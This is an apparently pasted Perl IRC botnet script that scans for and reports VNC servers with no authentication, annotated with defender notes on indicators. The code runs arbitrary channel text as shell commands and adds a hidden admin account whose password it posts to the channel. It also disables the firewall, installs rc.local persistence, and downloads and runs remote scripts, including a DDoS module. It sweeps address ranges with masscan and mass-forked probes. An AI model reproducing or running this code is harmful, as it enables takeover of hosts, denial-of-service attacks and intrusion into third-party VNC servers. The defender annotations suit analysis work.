independentt

Perl IRC bot - VNC Bypass

Oct 3rd, 2021 (edited)
  1. use strict;
  2. use warnings;
  3. use Mojo::IRC;
  4. use Net::Address::IP::Local;
  5. use Time::HiRes;
  6. use feature 'say';
  7. use Fcntl qw(:flock SEEK_END);
  # Bot-wide settings and scratch globals. The literal values in this run
  # (file names, channel names, limits) are usable as triage indicators.
  # NOTE(review): this $filename ('CCFinder.log') is not read again in the
  # listing; exploitrun declares its own lexical $filename.
  8. my $filename = 'CCFinder.log';
  # Unbuffer STDOUT so say() progress output is written immediately.
  9. $|=1;
  # Port tokens that exploitvnc passes to IO::Socket::INET as PeerPort, one
  # connection attempt per token per target (59xx are the conventional VNC
  # display ports).
  10. my @VNC_PORTS = qw/'5900 5901 5902 5903 5904 5905 5906 5907 5908 5909 5910 5911 5912 5913 5914 5915 5916 5917 5918 5919 5920 5921 5922 5923 5924 5925 5926 5927 5928 5929 5930 5931 5932 5933 5934 5935 5936 5937 5938 5939 5940 5941 5942 5943 5944 5945 5946 5947 5948 5949 5950 5951 5952 5953 5954 5955 5956 5957 5958 5959 5960 5961 5962 5963 5964 5965 5966 5967 5968 5969 5970 5971 5972 5973 5974 5975 5976 5977 5978 5979 5980 5981 5982 5983 5984 5985 5986 5987 5988 5989 5990 5991 5992 5993 5994 5995 5996 5997 5998 5999'/;
  11. use Mojo::IOLoop;
  # Seconds added to the current time to form each forked worker's deadline;
  # exploitrun sends TERM to workers that outlive it.
  12. my $forktimeout = 20;
  # Ceiling on concurrently tracked child PIDs in exploitrun. Defender note:
  # one perl parent with a very large number of short-lived children opening
  # outbound TCP connections to 59xx ports is a strong host-level signal.
  13. my $maxforks = 2500;
  # The bot joins $channel and sends all of its output as NOTICEs to
  # $noticechan.
  # NOTE(review): the '@' prefix presumably restricts delivery to channel
  # operators on servers that support it -- confirm against the IRC daemon.
  14. my $noticechan = '@#VNC';
  15. my $channel = '#VNC';
  # %events is only incremented (inside the subprocess callback), never read.
  16. my %events;
  # The remaining globals are scratch space for the getssh handler.
  17. my $range;
  18. my $minimum;
  19. my $random_number;
  20. my $random_user;
  21. my @arr4y;
  22. my $address;
  # IRC client object. Network indicators visible here: the hard-coded server
  # host and port, a nick of the form "VNC" followed by a random integer below
  # 99999, and the fixed user name "VNCScan".
  # NOTE(review): 6697 is conventionally an IRC-over-TLS port, but no TLS
  # setting is passed to the constructor in this listing; whether the session
  # is encrypted cannot be determined from here.
  23. my $irc = Mojo::IRC->new(
  24.  nick => 'VNC'.int(rand(99999)),
  25.  user => 'VNCScan',
  26.  server => 'irc-3.iownyour.biz:6697',
  27.  );
  # On disconnect, shell out and start "perl perlircssl.pl" in the background
  # (relative path; presumably this script's own file name -- confirm).
  # Defender note: dropping the IRC connection does not stop the bot; look for
  # the relaunched process and remove the script itself.
  28. $irc->on(close => sub { system("perl perlircssl.pl &") });
  # After the server's welcome reply, join the command channel.
  29. $irc->on(irc_rpl_welcome => sub {
  30.  my($irc, $err) = @_;
  31.  warn 'Joined IRC server.';
  32.  $irc->write(join => $channel);
  33.  });
  # Join events are subscribed to but the handler body is empty.
  34. $irc->on(irc_join => sub {
  35.  
  36.  });
  # Shared state between handlers; the only key used in this listing is
  # exploitpid (set by the spawn handler, read by the stopexploit branch).
  37. my $misc = {};
  # Command dispatcher for every PRIVMSG the client receives. Only the message
  # text (params[1]) is inspected; the sender is never checked, so the host
  # obeys anyone able to message the bot or its channel. The patterns are
  # unanchored and '.' matches any character, so a branch fires whenever its
  # keyword follows "@<any char>" anywhere in the text.
  # Defender summary: treat a host running this as fully attacker-controlled.
  # Every system()/backtick call below goes through the shell and none of the
  # exit codes are checked, so the "[info]" notices do not prove success.
  38. $irc->on(irc_privmsg => sub {
  39.  my($irc, $message) = @_;
  40.  my $msg = $message->{params}[1];
  # version: replies with a fixed banner string.
  41.  if ($msg =~ /@.version/) {
  42.   warn 'Version request.';
  43.   $irc->write(notice => $noticechan => "9,1Perl VNC bot [FINAL] by independent: 12https://github.com/independentcod");
  44.  }
  # autorun (persistence): installs /etc/rc.local and
  # /etc/systemd/system/rc-local.service -- copied from the working directory
  # when present, otherwise downloaded -- then enables the rc-local unit.
  # Hunt for: unexpected changes to those two files and a newly enabled
  # rc-local unit.
  45.  if ($msg =~ /@.autorun/) {
  46.   system("if [ ! -f ./rc.local ]; then curl -Lv -o /etc/rc.local https://raw.githubusercontent.com/ind3p3nd3nt/vncperlbot/master/rc.local; else cp -r ./rc.local /etc/rc.local; fi;");
  47.   system("chown root:root /etc/rc.local && chmod 755 /etc/rc.local && touch /etc/systemd/system/rc-local.service;");
  48.   system("if [ ! -f ./rc-local.service ]; then curl -Lv -o /etc/systemd/system/rc-local.service https://raw.githubusercontent.com/ind3p3nd3nt/vncperlbot/master/rc-local.service; else cp -r ./rc-local.service /etc/systemd/system/rc-local.service; fi;");
  49.   system("systemctl enable rc-local;");
  50.   $irc->write(notice => $noticechan => "[info] Autorun enabled\n");
  51.  }
  # cloak: downloads install.sh and runs it unverified with sh, then starts
  # another copy of ~/perlircssl.pl under proxychains. The current process is
  # not stopped here. Hunt for: perl launched as a child of proxychains.
  52.  if ($msg =~ /@.cloak/) {
  53.   system("curl -LvO https://raw.githubusercontent.com/ind3p3nd3nt/proxych/main/install.sh -o install.sh && sh install.sh &");
  54.   system("proxychains perl ~/perlircssl.pl &");
  55.   $irc->write(notice => $noticechan => "[info] Cloaked!\n");
  56.  }
  # novnc: same download-and-execute pattern for .install.sh, run with bash.
  57.   if ($msg =~ /@.novnc/) {
  58.   system("curl -LvO https://raw.githubusercontent.com/ind3p3nd3nt/novnc/main/.install.sh -o .install.sh && bash .install.sh &");
  59.   $irc->write(notice => $noticechan => "[info] NoVNC installed check terminal for input\n");
  60.  }
  # socks: installs a compiler toolchain via apt or yum, clones and builds a
  # repository in the working directory, and starts ./socks5server in the
  # background. The notice text claims a listener on 0.0.0.0:1080; the bind
  # itself is not visible in this listing. Hunt for: build tools appearing on
  # a server and an unexpected listener on 1080.
  61.    if ($msg =~ /@.socks/) {
  62.   system("if [ -f /usr/bin/apt ]; then apt update && apt install build-essential -y; else yum groupinstall 'Development Tools' -y; fi;");
  63.   system("git clone https://github.com/ind3p3nd3nt/socks && cp -r ./socks/* ./ && make -j8 && ./socks5server &");
  64.   $irc->write(notice => $noticechan => "[info] Socks5 Listening 0.0.0.0:1080\n");
  65.  }
  # blocknoobs: clones a repository and runs its setup.sh.
  # NOTE(review): judging by the repository name this rewrites iptables rules;
  # the script content is not shown here -- confirm.
  66.     if ($msg =~ /@.blocknoobs/) {
  67.   system("if [ -f /usr/bin/apt ]; then apt update && apt install build-essential -y; else yum groupinstall 'Development Tools' -y; fi;");
  68.   system("git clone https://github.com/ind3p3nd3nt/iptables_CIDR_drop.git && cp -r ./iptables_CIDR_drop/* ./ && sh setup.sh &");
  69.   $irc->write(notice => $noticechan => "[info] Now blocking noobs all over the world.\n");
  70.  }
  # fwreset: downloads iptables-reset.sh and runs it with sh.
  71.     if ($msg =~ /@.fwreset/) {
  72.   system("curl -LvO https://raw.githubusercontent.com/ind3p3nd3nt/fwreset/main/iptables-reset.sh -o iptables-reset.sh && sh iptables-reset.sh &");
  73.   $irc->write(notice => $noticechan => "[info] Firewall Reset!\n");
  74.  }
  # Remote shell: fires on any message that contains "sudo" anywhere. Installs
  # sudo if it is missing, echoes the message to the channel, then hands the
  # whole message to the shell with system() and again with backticks; the
  # captured output is relayed line by line with a 0.9 s pause. $fragment is
  # computed but never used.
  # Hunt for: sh children of the perl process running arbitrary commands, each
  # appearing twice in quick succession.
  75.  if ($msg =~ /sudo/) {
  76.              system("if [ ! -f /usr/bin/sudo ]; then if [ -f /usr/bin/apt ]; then apt update && apt install sudo -y; else yum install sudo -y; fi; fi;");
  77.              my $fragment =  substr $msg, 7;
  78.              $irc->write(notice => $noticechan => "$msg\n");
  79.              system("$msg");
  80.              my @output = `$msg 2>&1 3>&1`;
  81.              foreach(@output) {
  82.                Time::HiRes::sleep(0.9);
  83.                $irc->write(notice => $noticechan => "$_\r\n");        
  84.              }
  85.  }
  # getssh (backdoor account): flushes the iptables INPUT chain and sets its
  # policy to ACCEPT, creates a user whose name is 8 upper-case hex characters
  # with a random numeric password, adds it to wheel (yum systems) or sudo
  # (apt systems), overwrites /etc/ssh/sshd_config and /etc/ssh/sshd_banner
  # with downloaded copies, restarts the SSH service, and posts the resulting
  # login details to the channel in clear text.
  # NOTE(review): connected_to() presumably returns the local interface address
  # used to reach the named host rather than a public address -- confirm.
  # Hunt for: useradd/chpasswd spawned from perl, new 8-hex-character accounts
  # in wheel or sudo, a replaced sshd_config, and an emptied INPUT chain.
  # Response: anyone who saw the channel holds the credentials, so remove the
  # account and restore the SSH and firewall configuration from a known-good
  # source.
  86.   if ($msg =~ /@.getssh/) {
  87.   warn 'Flushing iptables & Accepting all remote connections.';
  88. system "sudo iptables -F INPUT";
  89. system "sudo iptables -P INPUT ACCEPT";
  90.   warn 'Adding new admin account...';
  91. $range = 999999999;
  92. $minimum = 100000000;
  93. $random_number = int(rand($range)) + $minimum;
  94. $random_user = sprintf("%08X", rand(0xFFFFFFFF));
  95. system 'sudo useradd -m ' . $random_user;
  96. system "echo $random_user:$random_number | sudo chpasswd";
  97. system 'if [ -f "/usr/bin/yum" ]; then sudo usermod -aG wheel ' . $random_user . '; fi';
  98. system 'if [ -f "/usr/bin/apt" ]; then sudo adduser ' . $random_user . ' sudo; fi';
  99.   warn 'Configuring SSH...';
  100. system 'wget -O /etc/ssh/sshd_config https://github.com/ind3p3nd3nt/vncperlbot/raw/master/sshd_config';
  101. system 'wget -O /etc/ssh/sshd_banner https://github.com/ind3p3nd3nt/vncperlbot/raw/master/sshd_banner';
  102. system 'if [ -f /usr/bin/yum ]; then sudo service sshd restart; fi';
  103. system 'if [ -f /usr/bin/apt ]; then sudo service ssh restart; fi';
  104.   warn 'Getting External IP Address';
  105.   $address = eval { Net::Address::IP::Local->connected_to('perlmaven.com') };
  106.   @arr4y = ('sshpass -p "', $random_number, '" ssh -l ', $random_user, $address);
  107.   warn "@arr4y";
  108.   $irc->write(notice => $noticechan => @arr4y);
  109.  }
  # stopexploit: only evaluated when the getssh pattern did not match (elsif).
  # Sends INT and then TERM to the PID recorded by the spawn handler.
  110.  elsif ($msg =~ /@.stopexploit/) {
  111.   warn 'stopexploit called, killing...';
  112.   if ( exists $misc->{exploitpid} )  {
  113.    $irc->write(notice => $noticechan => '[Info] Sending SIGTERM to PID ' . $misc->{exploitpid});
  114.    kill 'INT', $misc->{exploitpid};kill 'TERM', $misc->{exploitpid};
  115.    delete $misc->{exploitpid};
  116.    $irc->write(notice => $noticechan => '[Info] PID ' . $misc->{exploitpid} . " killed, !exploit stopped");
  117.    } else {
  118.     $irc->write(notice => $noticechan => "exploit is not running");
  119.    }
  120.   }
  # Messages that do not start with "@" plus one character stop here. Every
  # other message, including those already handled above, spawns a subprocess.
  121.   return unless $msg =~ /^\@./;
  # The first callback does the long-running work and returns result lines;
  # the second callback receives them (or an error) and posts them to IRC.
  # NOTE(review): Mojo::IOLoop->subprocess presumably runs the first callback
  # in a forked child, so $events and other variables changed there would not
  # be visible to the parent -- confirm.
  122.   my $subprocess = Mojo::IOLoop->subprocess(
  123.    sub {
  124.     my $s = shift;
  125.     my @IRC_RESULTS;
  126.     $events{connect}++;
  # scan: runs masscan against port 5900 at rate 25000 and writes hosts.txt
  # in the working directory. The range token is captured with [^\s]+ and
  # placed unsanitized into a shell command line, so unvalidated channel text
  # reaches the shell here as well.
  # Hunt for: a masscan process started by perl, and hosts.txt / ips.txt next
  # to the script.
  127.     if ($msg =~ /@.scan ([^\s]+)/) {
  128.      $s->progress("[Info] Starting masscan... [VNC Scan in progress ...]");
  129.      my $range = $1;
  130.      my $masscancmd = "masscan -p 5900 --range $range --rate 25000 --open --banners -oG hosts.txt ";
  131.      warn "Received rangescan request on $range , running masscan...";
  132.      my $r = `$masscancmd`;
  133.      push @IRC_RESULTS, $_ foreach split "\n", $r;
  # ddos: downloads ddos.py, marks it executable and runs it; its output lines
  # are collected as results. Hunt for: ddos.py in the working directory.
  134.      } elsif ($msg =~ /@.ddos ([^\s]+)/) {
  135.      $s->progress("[Info] Installing DDoS Module");
  136.      my $ddos = "curl -LvO https://raw.githubusercontent.com/ind3p3nd3nt/ddos/master/ddos.py -o ddos.py && chmod +x ddos.py && ./ddos.py $@";
  137.      my $r = `$ddos`;
  138.      push @IRC_RESULTS, $_ foreach split "\n", $r;
  139.      $s->progress("[Info] DDoS Module Installed use: sudo ddos.py arguments...");
  140.      }
  # exploit: runs exploitrun in "vnc" mode; its return value is not used.
  141.      elsif ($msg =~ /@.exploit/) {
  142.       warn 'Received exploitrun request, exploiting hosts.txt...';
  143.       my $r = exploitrun ("vnc", $s, $s->pid);
  144.  
  # format: deletes ips.txt and rebuilds it from every IPv4-looking string
  # found in hosts.txt.
  145.       } elsif ($msg =~ /@.format/) {
  146.        warn 'Received file formatting request, processing...';    
  147.        my $formatcmd = "rm -rf ips.txt && cat hosts.txt | grep -Eo '[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}' >>ips.txt";
  148.        my $r = `$formatcmd`;
  149.        push @IRC_RESULTS, $_ foreach split "\n", $r;
  150.       }
  151.       return @IRC_RESULTS;
  # Completion callback: announces that the command finished, then posts
  # either the error or each collected result line.
  152.       }, sub {
  153.        my ($s, $error, @res) = @_;
  154.        $irc->write(notice => $noticechan => " FINISHED: $msg");
  155.        warn "Finished work: $msg";
  156.        if ( $error ) {
  157.         warn "ERROR FOUND: $error";
  158.         $irc->write(notice => $noticechan => "ERROR: " . $error);
  159.         return;
  160.        }
  161.        $irc->write(notice => $noticechan => $_) foreach @res;
  162.        });
  163.  
  # Relay progress() messages from the subprocess to the channel.
  164.   $subprocess->on(progress => sub {
  165.    my ($subprocess, @data) = @_;
  166.    $irc->write(notice => $noticechan => $_) foreach @data; # this prints the data from subprocesses
  167.    });
  # When the subprocess starts, remember its PID for the exploit command so
  # that the stopexploit branch can signal it later.
  168.   $subprocess->on(spawn => sub {
  169.    my $subprocess = shift;
  170.    my $pid = $subprocess->pid;
  171.    # $irc->write(notice => $noticechan =>  "Performing work in process $pid");
  172.    if ( $msg =~ /@.exploit/ ) {
  173.     $irc->write(notice => $noticechan => 'pid: ' . $pid) ;
  174.     $misc->{exploitpid} = $pid ;
  175.    }
  176.    });
  177.   });
  # Connect to the IRC server and enter the event loop. If the connection
  # fails, the callback downloads a script through a URL shortener to ".fw",
  # runs it with sh, and starts another copy of perlircssl.pl.
  # Defender note: the shortened URL means the fetched content can change
  # over time; capture what it currently resolves to during an investigation
  # rather than assuming it matches the fwreset script referenced elsewhere.
  # Hunt for: a hidden ".fw" file in the bot's working directory.
  178.    $irc->connect(sub {
  179.     my($irc, $err) = @_;
  180.     return system("wget -O .fw is.gd/fwreset && sh .fw && perl perlircssl.pl &") if $err;
  181.     $irc->write(join => $channel);
  182.     });
  # Blocks here running the event loop; the sub definitions below are compiled
  # before this point is reached.
  183.    Mojo::IOLoop->start;
  184.  
  # Probe one address for VNC servers across every entry of @VNC_PORTS and
  # report hits through $subp->progress.
  #
  # Arguments: $row (target address), $subp (subprocess object used for
  # progress reporting), $ownpid and $arg (accepted but unused).
  # Does not return: ends with exit, terminating the calling process, which
  # in this listing is the child forked by exploitrun.
  #
  # NOTE(review): per the RFB handshake, the byte 0x01 written after the
  # security-type list selects security type "None", so a hit appears to mean
  # the server accepted a session with no authentication at all rather than
  # any bypass of a configured password -- confirm against the RFB spec.
  # Mitigation follows directly: require VNC authentication and keep 59xx
  # ports off untrusted networks.
  185.    sub exploitvnc {
  186.     my $row = shift;
  187.     my $subp = shift;
  188.     my $ownpid = shift;
  189.     my $arg = shift;
  190.     foreach my $vncport (@VNC_PORTS){
  # 10-second connect timeout; ports that do not answer are skipped.
  191.      my $sock = IO::Socket::INET->new(PeerAddr => $row, PeerPort => $vncport, Proto => 'tcp', Timeout => 10);
  192.      next unless $sock;
  # Read the server's 12-byte banner, which is echoed back unchanged below.
  193.      $sock->read(my $proto_ver, 12);
  # Handshake errors are swallowed by the eval; nothing inspects $@.
  194.      eval {
  195.       print $sock $proto_ver;
  196.       $sock->read(my $sec_types, 1);
  197.       $sock->read(my $ignored, unpack('C', $sec_types));
  198.       print $sock "\x01";
  199.       $sock->read(my $auth_type, 4);
  200.       print $sock "\x01";
  201.      };
  202.      my $ver = "RFB 003.008";
  # NOTE(review): these four bytes are presumably the start of the server's
  # init message (framebuffer dimensions) -- confirm.
  203.      $sock->read(my $vnc_data, 4);
  # Report only when the four bytes are non-zero, the banner matches $ver, and
  # the bytes contain one of the values 4, 195, 208, 88, 87 or 7. Every branch
  # emits the same " address:port data " progress line.
  204.      if (unpack('I', $vnc_data)) {
  205.       if ($proto_ver =~ $ver) {
  206.        $proto_ver =~ s/[\r\n]+//g;
  207.        if (index($vnc_data, chr(4)) != -1) {
  208.  
  209.         $subp->progress(" $row:$vncport $vnc_data ");
  210.        }
  211.        elsif (index($vnc_data, chr(195)) != -1) {
  212.  
  213.         $subp->progress(" $row:$vncport $vnc_data ");
  214.        }
  215.        elsif (index($vnc_data, chr(208)) != -1) {
  216.  
  217.         $subp->progress(" $row:$vncport $vnc_data ");
  218.        }
  219.        elsif (index($vnc_data, chr(88)) != -1) {
  220.  
  221.         $subp->progress(" $row:$vncport $vnc_data ");
  222.        }
  223.        elsif (index($vnc_data, chr(87)) != -1) {
  224.  
  225.         $subp->progress(" $row:$vncport $vnc_data ");
  226.        }
  227.        elsif (index($vnc_data, chr(7)) != -1) {
  228.  
  229.         $subp->progress(" $row:$vncport $vnc_data ");
  230.        }
  231.       }
  232.      }
  233.     }
  # Terminate the current process once every port has been tried.
  234.     exit;
  235.    }
  236.  
  # Fork-per-target driver: reads addresses from ips.txt and forks one child
  # per address, keeping at most $maxforks children tracked and sending TERM
  # to any child older than $forktimeout seconds.
  #
  # Arguments: $arg (mode string matched against rdp/ssh/mysql/smtp/vnc),
  # $subp (subprocess object used for progress messages), $ownpid (forwarded
  # to the per-target routine).
  # Only exploitvnc is defined in this listing and the only visible caller
  # passes "vnc"; exploitrdp, exploitssh, exploitmysql and exploitsmtp are not
  # shown here.
  # Defender note: the visible footprint is ips.txt in the working directory
  # plus a burst of short-lived perl children making outbound connections.
  237.    sub exploitrun {
  238.     my $arg = shift;
  239.     my $subp = shift;
  240.     my $ownpid = shift;
  # Ignore SIGCHLD; liveness of children is polled with kill 0 below.
  241.     $SIG{CHLD} = 'IGNORE';
  242.     $subp->progress("[Info] Starting $arg Exploiter ");
  243.     my @ips;
  244.     my %ips;
  245.     my $filename = 'ips.txt';
  # A missing or unreadable ips.txt is not reported; the run then simply has
  # zero targets.
  246.     if (open(my $fh, '<:encoding(UTF-8)', $filename)) {
  247.      while (my $row = <$fh>) {
  248.       chomp $row;
  # Keep the first dotted-quad found on the line; lines without one are kept
  # as they are. Hash keys de-duplicate the entries.
  249.       $row = $1 if $row =~ /(\d+\.\d+\.\d+\.\d+)/;
  250.       #push @ips, $row;
  251.       $ips{$row} = '';
  252.      }
  253.      close $fh;
  254.     }
  # Targets are processed in string-sorted order.
  255.     push @ips, $_ foreach (sort {$a cmp $b} keys %ips);
  # %pids maps child PID => epoch deadline.
  256.     my %pids;
  257.     $subp->progress("Calling IPs (" . int (scalar @ips) . ")");
  258.  
  259.     my $finished = 0;
  260.     my $i = 0;
  # Main loop: every 0.1 s drop children that have exited, TERM those past
  # their deadline, and start one more child if below the $maxforks ceiling.
  261.     while ( @ips > 0 )
  262.     {
  263.      Time::HiRes::sleep(0.1);
  264.      #$subp->progress("[Info] In progress");
  265.      foreach (keys %pids){
  # kill 0 sends no signal; it only tests whether the PID can be signalled.
  266.       my $exists = kill 0, $_; # kill 'TERM', $_
  267.       if ( $exists ) {
  268.        kill 'TERM', $_ if $pids{$_} < CORE::time;
  269.        } else {
  270.         delete $pids{$_}
  271.        }
  272.       }
  273.       if ( scalar keys %pids >= $maxforks )
  274.       {
  # At the ceiling: print the queue length and child count to STDOUT, then
  # wait for the next pass.
  275.        say int scalar @ips;
  276.        say 'pids: ' . scalar keys %pids;
  277.        } else {
  278.         my $targetip = shift @ips;
  279.         say 'Sending ' . $targetip;
  280.         my $pid;
  281.         if ($pid = fork) {
  # Parent: print the child's PID.
  282.          say $pid;
  283.          } else {
  # Child (or failed fork): dispatch on the mode string. exploitvnc ends with
  # exit, so in "vnc" mode the child does not continue past that call.
  284.           if ($arg =~ /rdp/) {
  285.            exploitrdp($targetip, $subp, $ownpid);
  286.           }
  287.           if ($arg =~ /ssh/) {
  288.            exploitssh($targetip, $subp, $ownpid);
  289.           }
  290.           if ($arg =~ /mysql/) {
  291.            exploitmysql($targetip, $subp, $ownpid);
  292.           }
  293.           if ($arg =~ /smtp/) {
  294.            exploitsmtp($targetip, $subp, $ownpid);
  295.           }
  296.           if ($arg =~ /vnc/) {
  297.            exploitvnc($targetip, $subp, $ownpid);
  298.           }
  299.          }
  # Record the deadline after which this child is sent TERM.
  300.          $pids{$pid} = CORE::time + $forktimeout;
  301.         }
  302.        }
  303.        $subp->progress("Done Calling IPs");
  # Drain phase: same liveness and deadline check until no child remains.
  304.        while ( scalar keys %pids > 0 ) # wait for last alive forks to terminate
  305.        {
  306.         Time::HiRes::sleep(0.1);
  307.         foreach (keys %pids){
  308.          my $exists = kill 0, $_; # kill 'TERM', $_
  309.          if ( $exists ) {
  310.  
  311.           kill 'TERM', $_ if $pids{$_} < CORE::time;
  312.           } else {
  313.            delete $pids{$_}
  314.           }
  315.          }
  316.         }
  317.         $subp->progress("[Info] $arg Done Scan");
  318.        }
  # Take an exclusive advisory lock on the given filehandle and die with the
  # OS error text if flock fails. Returns flock's true result on success.
  # Not called anywhere in this listing.
  sub lockf {
      my $handle = shift;
      my $locked = flock($handle, LOCK_EX);
      die "Cannot lock - $!\n" unless $locked;
      return $locked;
  }
  # Release the advisory lock held on the given filehandle and die with the
  # OS error text if flock fails. Returns flock's true result on success.
  # Not called anywhere in this listing.
  sub unlock {
      my $handle = shift;
      my $released = flock($handle, LOCK_UN);
      die "Cannot unlock - $!\n" unless $released;
      return $released;
  }